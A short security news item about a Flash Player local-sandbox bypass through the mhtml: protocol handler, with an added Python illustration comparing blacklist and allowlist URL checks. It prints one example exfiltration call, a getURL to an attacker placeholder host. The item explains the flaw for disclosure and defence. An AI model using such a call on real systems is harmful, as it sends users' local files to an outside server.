Flash Player sandbox can be bypassed
Flash applications run locally can read local files and send them to an online server – something which the sandbox is supposed to prevent.
Flash includes a number of sandboxes which impose restrictions depending on the origin of, and access rights for, the SWF file. Local SWF files, for example, which run within the local-with-file-system sandbox, are permitted to access local files but not the network, so a malicious SWF applet should not be able to send local data to a remote server.
However, security specialist Billy Rios has determined that Adobe controls network access using a blacklist of protocol handlers. Protocols such as HTTP and HTTPS are blacklisted. Rios reports that it is in principle possible to send files to a server using the file: protocol handler, but only within the local area network. He has identified another protocol handler, mhtml, which can be used to send data to remote servers.
MHTML is supported by default under Windows, so, according to Rios, local data can be sent to a remote server using the ActionScript call getURL('mhtml:http://attacker-server.com/stolen-data-here', ''). Rios has not provided a specific demo SWF file to illustrate the problem.
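To make the design flaw concrete, the following added Python example (not Adobe's code and not Rios' demo) models the two ways a sandbox can gate outbound URLs: the handler blacklist the article describes, and a positive allowlist that only admits file: URLs naming no host. The scheme sets and the sample URLs are assumptions constructed for the illustration.

```python
from urllib.parse import urlsplit

# Constructed policy sets for the illustration, not Adobe's actual lists.
DENIED_SCHEMES = {"http", "https"}   # blacklist of handlers, as the article describes
ALLOWED_SCHEMES = {"file"}           # allowlist for a local-with-filesystem sandbox


def scheme_of(url: str) -> str:
    """The protocol handler is whatever precedes the first ':' in the URL."""
    return url.split(":", 1)[0].strip().lower()


def blacklist_allows(url: str) -> bool:
    """Blacklist policy: any handler not explicitly denied is let through."""
    return scheme_of(url) not in DENIED_SCHEMES


def allowlist_allows(url: str) -> bool:
    """Allowlist policy: only file: URLs, and only ones with no host part.

    A file: URL with a host (file://server/share) would reach a LAN machine,
    which is the file: exfiltration path the article mentions.
    """
    if scheme_of(url) not in ALLOWED_SCHEMES:
        return False
    return urlsplit(url).netloc == ""


def check(url: str) -> dict:
    """Evaluate one URL under both policies so the difference is visible."""
    return {"url": url,
            "blacklist": blacklist_allows(url),
            "allowlist": allowlist_allows(url)}


if __name__ == "__main__":
    # Constructed sample URLs covering local disk, LAN share, HTTP and the
    # mhtml: wrapper from the article.
    for u in ["file:///C:/Users/me/secret.txt",
              "file://fileserver/share/report.doc",
              "http://attacker-server.com/stolen-data-here",
              "mhtml:http://attacker-server.com/stolen-data-here"]:
        print(check(u))
```

The mhtml: URL passes the blacklist because its handler is simply not on the list, while the allowlist rejects it and the LAN share alike without needing to know about either.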
It is certainly surprising that it is so easy to bypass one of the Flash sandboxes. However, this particular issue does not represent a major risk as few users download SWF files and run them locally. SWF files are generally loaded directly in a browser Flash plug-in, which uses a different rule set.